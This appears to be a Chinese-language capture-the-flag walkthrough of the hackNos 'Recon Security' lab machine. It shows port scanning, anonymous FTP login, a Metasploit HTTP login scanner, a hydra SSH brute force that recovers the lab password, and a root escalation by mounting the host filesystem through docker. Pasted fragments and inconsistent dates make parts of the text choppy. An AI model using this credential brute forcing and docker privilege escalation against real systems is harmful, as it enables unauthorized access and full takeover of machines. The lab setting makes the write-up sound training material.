└─# nmap -p- -sV -sT -T4 192.168.5.132 Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-24 17:23 CST Nmap scan report for 192.168.5.132 Host is up (0.0012s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later 22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) MAC Address: 00:0C:29:48:11:36 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
上面的文字为is requesting your username and password. The site says: “Recon Security
尝试ftp匿名登录
1 2 3 4 5 6 7 8 9 10 11 12 13 14
└─# ftp 192.168.5.132 Connected to 192.168.5.132. 220 "Security@hackNos". Name (192.168.5.132:root): ftp 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK.
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/http/dlink_dir_300_615_http_login normal No D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility 1 auxiliary/scanner/http/dlink_dir_session_cgi_http_login normal No D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility 2 auxiliary/scanner/http/dlink_dir_615h_http_login normal No D-Link DIR-615H HTTP Login Utility 3 auxiliary/scanner/http/http_login normal No HTTP Login Utility 4 auxiliary/scanner/vmware/vmware_http_login normal No VMWare Web Login Scanner
Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/vmware/vmware_http_login
msf6 > use 3 msf6 auxiliary(scanner/http/http_login) > show options
Name Current Setting Required Description ---- --------------- -------- ----------- AUTH_URI no The URI to authenticate against (default:auto) BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET) RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/http_default_users.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host
└─# hydra -l recon -P passrecon ssh://192.168.5.132 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-17 22:07:52 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), ~1 try per task [DATA] attacking ssh://192.168.5.132:22/ [22][ssh] host: 192.168.5.132 login: recon password: Security@hackNos 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-17 22:07:55
└─# ssh recon@192.168.5.132 The authenticity of host '192.168.5.132 (192.168.5.132)' can't be established. ECDSA key fingerprint is SHA256:YyrsJ6SfcrEjupojYvAzzhetfPVnVVv4XDFAoaf2FGw. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.5.132' (ECDSA) to the list of known hosts. recon@192.168.5.132's password: Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-24-generic x86_64)
31 updates can be installed immediately. 0 of these updates are security updates. To see these additional updates run: apt list --upgradable
Your Ubuntu release is not supported anymore. For upgrade information, please visit: http://www.ubuntu.com/releaseendoflife
New release '20.04.3 LTS' available. Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Jan 10 23:05:02 2020 from 192.168.0.104 recon@hacknos:~$ sudo -l [sudo] password for recon: Matching Defaults entries for recon on hacknos: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User recon may run the following commands on hacknos: (ALL : ALL) ALL
REPOSITORY TAG IMAGE ID CREATED SIZE recon@hacknos:~$ recon@hacknos:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh Unable to find image 'alpine:latest' locally latest: Pulling from library/alpine a0d0a0d46f8b: Pull complete Digest: sha256:e1c082e3d3c45cccac829840a25941e679c25d438cc8412c2fa221cf1a824e6a Status: Downloaded newer image for alpine:latest # id uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# # exit recon@hacknos:~$ docker run -it -v /:/mbt e7d92cdc71fe Unable to find image 'e7d92cdc71fe:latest' locally docker: Error response from daemon: pull access denied for e7d92cdc71fe, repository does not exist or may require 'docker login': denied: requested access to the resource is denied. See 'docker run --help'. recon@hacknos:~$ docker iamges docker: 'iamges' is not a docker command. See 'docker --help' recon@hacknos:~$ docker images REPOSITORY TAG IMAGE ID CREATED SIZE alpine latest 14119a10abf4 2 weeks ago 5.6MB recon@hacknos:~$ docker run -it -v /:/mbt 14119a10abf4 / # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) / # ls bin dev etc home lib mbt media mnt opt proc root run sbin srv sys tmp usr var / # cd root/ ~ # ls ~ # cd .. / # cd /mbt /mbt # ls bin dev initrd.img lib32 lost+found opt run srv usr vmlinuz.old boot etc initrd.img.old lib64 media proc sbin sys var cdrom home lib libx32 mnt root snap tmp vmlinuz /mbt # cd root /mbt/root # ls root.txt snap /mbt/root # cat root cat: can't open 'root': No such file or directory /mbt/root # cat root.txt $$\ $$$$$$$\ \$$\ $$ __$$\ $$$$\ \$$\ $$ | $$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ \____| \$$\ $$$$$$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ $$$$\ $$ | $$ __$$< $$$$$$$$ |$$ / $$ / $$ |$$ | $$ | \____|$$ / $$ | $$ |$$ ____|$$ | $$ | $$ |$$ | $$ | $$ / $$ | $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$ |$$ | $$ | \__/ \__| \__| \_______| \_______| \______/ \__| \__|
Kernel version: 5.3.0 Architecture: x86_64 Distribution: ubuntu Distribution version: 19.10 Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed Package listing: from current OS
For Linux distribution that glibc has no tcache support:
if a target is Debian 9, Ubuntu 16.04, or Ubuntu 14.04, try exploit_nss_xxx.py for specific version first next, try exploit_defaults_mailer.py. If you know a target sudo is compiled with --disable-root-mailer, you can skip this exploit. The exploit attempt to check root mailer flag from sudo binary. But sudo permission on some Linux distribution is 4711 (-rws--x--x) which is impossible to check on target system. (Known work OS is CentOS 6 and 7) last, try exploit_userspec.py
